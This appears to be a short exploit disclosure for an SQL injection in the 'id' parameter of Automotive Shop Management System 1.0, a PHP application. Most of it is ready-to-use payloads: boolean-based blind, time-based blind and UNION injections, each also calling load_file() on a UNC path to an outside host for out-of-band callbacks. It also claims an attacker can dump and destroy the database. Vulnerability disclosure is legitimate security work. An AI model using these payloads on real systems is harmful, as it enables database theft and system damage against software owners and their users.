Automotive Shop Management System 1.0 SQL Injection

## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi## Author: nu11secur1ty## Date: 12.03.2022## Vendor: https://github.com/oretnom23,https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The attacker can dump all database information without any problems,and then he can destroy this system, it is dependingfrom the scenario.## STATUS: Critically awful[+] Payload:```MySQL---Parameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: id=7'+(selectload_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''OR NOT 9828=9828 AND 'NWsG'='NWsG    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=7'+(selectload_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc    Type: UNION query    Title: MySQL UNION query (NULL) - 8 columns    Payload: id=7'+(selectload_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''UNION ALL SELECTNULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0)## Proof and Exploit:[href](https://streamable.com/c5v75u)## Time spent`00:27:00`## Time attack`00:01:57`